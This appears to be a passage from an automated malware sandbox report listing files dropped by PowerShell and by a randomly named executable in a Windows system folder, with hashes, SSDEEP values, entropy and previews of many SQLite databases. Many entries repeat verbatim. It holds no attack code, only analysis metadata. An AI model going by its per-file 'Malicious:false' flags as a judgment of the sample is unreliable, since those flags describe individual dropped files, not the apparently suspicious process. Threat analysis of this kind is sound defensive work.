                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.323856189774723
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LVKzVrNS90O:LIRrA90O
                                                                                                MD5:94D71328B4FADE0B7066F12E9384F293
                                                                                                SHA1:EB5852968E1ECF9ED1C3979B4461371D0C73AC85
                                                                                                SHA-256:23C1132515A29C4242A094E4425910CB6DE2861507CA3B812840417D983E5CCE
                                                                                                SHA-512:305F5F16A8FF8B171D4EC3B1F17D29FE562D77D85BA45074119639EB021B70F352BF8697D6B36C930A7210D087E434C3720F9F8DB7D07F9D48459B41B6C038FE
                                                                                                Malicious:false
                                                                                                Preview:YXO04E84IU7LCflfM6uh7XrAk
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
